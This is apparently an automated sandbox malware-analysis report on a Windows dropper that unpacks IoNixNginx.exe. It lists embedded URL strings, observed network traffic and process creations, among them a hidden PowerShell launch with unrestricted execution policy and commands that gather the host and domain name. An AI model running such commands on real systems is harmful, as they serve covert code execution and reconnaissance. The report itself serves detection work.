Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://in.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://in.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://in.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://log.getdropbox.com/hpkp
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://lss.sse-iacapps.com/query?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/favicon.icohttps://malaysia.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://metager.de/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://metager.de/favicon.icohttps://metager.de/meta/meta.ger3?eingabe=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://metager.de/meta/meta.ger3?eingabe=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://metager.org/meta/meta.ger3?eingabe=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://mx.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://mx.search.yahoo.com/favicon.icohttps://mx.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://mx.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nl.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nl.search.yahoo.com/favicon.icohttps://nl.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nl.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nl.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nz.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nz.search.yahoo.com/favicon.icohttps://nz.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nz.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nz.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://oceanhero.today/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://oceanhero.today/favicon.icohttps://oceanhero.today/web?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://oceanhero.today/web?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://pe.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://pe.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://pe.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://petalsearch.com/search?query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ph.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ph.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ph.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/IIJ
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://qc.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://qc.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://qc.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://se.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://se.search.yahoo.com/favicon.icohttps://se.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://se.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.icohttps://petalsearch.com/search?query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.com.tr/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.com.tr/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.kz/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.ua/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.by/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageviewhttps://www.yandex.by/chrome/newtabhttps://storage.ape
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com/images/search?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com/search/?text=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.kz/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageviewhttps://www.yandex.kz/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.ua/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageviewhttps://www.yandex.ua/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icohttps://yandex.by/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icohttps://yandex.com/search/?text=
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVE memstr_f191d8fd-4

System Summary

Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File dump: IoNixNginx.exe.5.dr 160084992
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File dump: IoNixNginx.exe0.5.dr 160084992
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Process token adjusted: Security
Source: libEGL.dll0.5.dr Static PE information: Number of sections : 11 > 10
Source: libEGL.dll.5.dr Static PE information: Number of sections : 11 > 10
Source: IoNixNginx.exe.5.dr Static PE information: Number of sections : 15 > 10
Source: vulkan-1.dll0.5.dr Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.5.dr Static PE information: Number of sections : 11 > 10
Source: IoNixNginx.exe0.5.dr Static PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll0.5.dr Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.5.dr Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.5.dr Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.5.dr Static PE information: Number of sections : 11 > 10
Source: AyqwnIUrcz.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal56.winEXE@75/167@3/3
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File created: C:\Users\user\AppData\Roaming\hgekorcpiasneymc
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File created: C:\Users\user~1\AppData\Local\Temp\nsvCD79.tmp
Source: AyqwnIUrcz.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: AyqwnIUrcz.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File read: C:\Users\user\Desktop\AyqwnIUrcz.exe
Source: unknown Process created: C:\Users\user\Desktop\AyqwnIUrcz.exe "C:\Users\user\Desktop\AyqwnIUrcz.exe"
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe Process created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
